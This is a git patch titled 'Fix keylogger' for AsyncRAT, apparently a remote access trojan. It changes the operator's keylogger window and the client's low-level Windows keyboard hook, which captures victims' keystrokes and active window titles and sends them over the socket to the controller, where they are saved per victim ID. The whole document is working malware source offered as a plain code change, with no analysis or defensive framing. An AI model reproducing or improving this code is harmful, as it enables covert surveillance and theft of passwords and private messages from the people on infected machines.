From 5538fc87afc1da1be99ccf494994a08d227ea6e5 Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Sun, 2 Jun 2019 08:22:38 +0300 Subject: [PATCH] Fix keylogger --- .../Forms/FormKeylogger.Designer.cs | 11 ++-- .../AsyncRAT-Sharp/Forms/FormKeylogger.cs | 5 +- .../Handle Packet/HandleKeylogger.cs | 3 +- .../Client/Handle Packet/HandleLimeLogger.cs | 57 +++++-------------- 4 files changed, 26 insertions(+), 50 deletions(-) diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormKeylogger.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormKeylogger.Designer.cs index 017fe4e..91f19e0 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormKeylogger.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormKeylogger.Designer.cs @@ -56,7 +56,7 @@ this.toolStripButton1}); this.toolStrip1.Location = new System.Drawing.Point(0, 0); this.toolStrip1.Name = "toolStrip1"; - this.toolStrip1.Size = new System.Drawing.Size(731, 32); + this.toolStrip1.Size = new System.Drawing.Size(731, 34); this.toolStrip1.TabIndex = 0; this.toolStrip1.Text = "toolStrip1"; // @@ -69,14 +69,14 @@ // toolStripTextBox1 // this.toolStripTextBox1.Name = "toolStripTextBox1"; - this.toolStripTextBox1.Size = new System.Drawing.Size(100, 32); + this.toolStripTextBox1.Size = new System.Drawing.Size(100, 34); this.toolStripTextBox1.Text = "..."; this.toolStripTextBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.ToolStripTextBox1_KeyDown); // // toolStripSeparator1 // this.toolStripSeparator1.Name = "toolStripSeparator1"; - this.toolStripSeparator1.Size = new System.Drawing.Size(6, 32); + this.toolStripSeparator1.Size = new System.Drawing.Size(6, 34); // // toolStripButton1 // @@ -92,9 +92,10 @@ // this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None; this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Fill; - this.richTextBox1.Location = new System.Drawing.Point(0, 32); + this.richTextBox1.Location = new System.Drawing.Point(0, 34); this.richTextBox1.Name = "richTextBox1"; - this.richTextBox1.Size = new System.Drawing.Size(731, 378); + this.richTextBox1.ReadOnly = true; + this.richTextBox1.Size = new System.Drawing.Size(731, 376); this.richTextBox1.TabIndex = 1; this.richTextBox1.Text = ""; // diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormKeylogger.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormKeylogger.cs index ed228ae..f21d49a 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormKeylogger.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormKeylogger.cs @@ -23,6 +23,8 @@ namespace AsyncRAT_Sharp.Forms public Form1 F { get; set; } internal Clients C { get; set; } + public StringBuilder SB = new StringBuilder(); + private void Timer1_Tick(object sender, EventArgs e) { if (!C.ClientSocket.Connected) this.Close(); @@ -30,6 +32,7 @@ namespace AsyncRAT_Sharp.Forms private void Keylogger_FormClosed(object sender, FormClosedEventArgs e) { + SB?.Clear(); MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "keyLogger"; msgpack.ForcePathObject("isON").AsString = "false"; @@ -67,7 +70,7 @@ namespace AsyncRAT_Sharp.Forms string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder\\" + C.ID + "\\Keylogger"); if (!Directory.Exists(fullPath)) Directory.CreateDirectory(fullPath); - File.WriteAllText(fullPath + $"\\Keylogger_{DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss")}.txt", richTextBox1.Text); + File.WriteAllText(fullPath + $"\\Keylogger_{DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss")}.txt", richTextBox1.Text.Replace("\n", Environment.NewLine)); } catch { } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleKeylogger.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleKeylogger.cs index c80cfa2..d7195a8 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleKeylogger.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleKeylogger.cs @@ -22,7 +22,8 @@ namespace AsyncRAT_Sharp.Handle_Packet FormKeylogger KL = (FormKeylogger)Application.OpenForms["keyLogger:" + client.ID]; if (KL != null) { - KL.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Log").GetAsString()); + KL.SB.Append(unpack_msgpack.ForcePathObject("Log").GetAsString()); + KL.richTextBox1.Text = KL.SB.ToString(); KL.richTextBox1.SelectionStart = KL.richTextBox1.TextLength; KL.richTextBox1.ScrollToCaret(); } diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs b/AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs index 442c5eb..098b9f7 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs @@ -26,7 +26,7 @@ namespace Client.Handle_Packet { while (ClientSocket.IsConnected) { - Thread.Sleep(500); + Thread.Sleep(10); if (isON == false) { break; @@ -34,6 +34,7 @@ namespace Client.Handle_Packet } UnhookWindowsHookEx(_hookID); CurrentActiveWindowTitle = ""; + Application.Exit(); }).Start(); Application.Run(); } @@ -75,13 +76,13 @@ namespace Client.Handle_Packet switch (((Keys)vkCode).ToString()) { case "Space": - currentKey = "[SPACE]"; + currentKey = " "; break; case "Return": - currentKey = $"[ENTER]{Environment.NewLine}"; + currentKey = "[ENTER]\n"; break; - case "escape": - currentKey = "[ESC]"; + case "Escape": + currentKey = "[ESC]\n"; break; case "LControlKey": currentKey = "[CTRL]"; @@ -102,15 +103,8 @@ namespace Client.Handle_Packet currentKey = "[WIN]"; break; case "Tab": - currentKey = "[Tab]"; + currentKey = "[Tab]\n"; break; - case "Capital": - if (CapsLock == true) - currentKey = "[CAPSLOCK: OFF]"; - else - currentKey = "[CAPSLOCK: ON]"; - break; - } } @@ -130,7 +124,7 @@ namespace Client.Handle_Packet MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Packet").AsString = "keyLogger"; msgpack.ForcePathObject("log").AsString = sb.ToString(); - Sockets.ClientSocket.Send(msgpack.Encode2Bytes()); + ClientSocket.Send(msgpack.Encode2Bytes()); } return CallNextHookEx(_hookID, nCode, wParam, lParam); } @@ -157,33 +151,14 @@ namespace Client.Handle_Packet } private static string GetActiveWindowTitle() - { - const int nChars = 256; - StringBuilder Buff = new StringBuilder(nChars); - IntPtr handle = GetForegroundWindow(); - - if (GetWindowText(handle, Buff, nChars) > 0) - { - CurrentActiveWindowTitle = Path.GetFileName(Buff.ToString()); - return CurrentActiveWindowTitle; - } - else - { - return GetActiveProcessFileName(); - } - } - - private static string GetActiveProcessFileName() { try { - string pName; IntPtr hwnd = GetForegroundWindow(); GetWindowThreadProcessId(hwnd, out uint pid); Process p = Process.GetProcessById((int)pid); - pName = Path.GetFileName(p.MainModule.FileName); - - return pName; + CurrentActiveWindowTitle = p.MainWindowTitle; + return p.MainWindowTitle; } catch (Exception) { @@ -191,13 +166,16 @@ namespace Client.Handle_Packet } } - #region "Hooks & Native Methods" private const int WM_KEYDOWN = 0x0100; private static readonly LowLevelKeyboardProc _proc = HookCallback; private static IntPtr _hookID = IntPtr.Zero; + private static readonly int WHKEYBOARDLL = 13; + private static string CurrentActiveWindowTitle; + + private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] @@ -208,15 +186,8 @@ namespace Client.Handle_Packet [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetModuleHandle(string lpModuleName); - private static readonly int WHKEYBOARDLL = 13; - - private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam); - - [DllImport("user32.dll")] - static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count); [DllImport("user32.dll")] static extern IntPtr GetForegroundWindow(); - private static string CurrentActiveWindowTitle; [DllImport("user32.dll", SetLastError = true)] static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);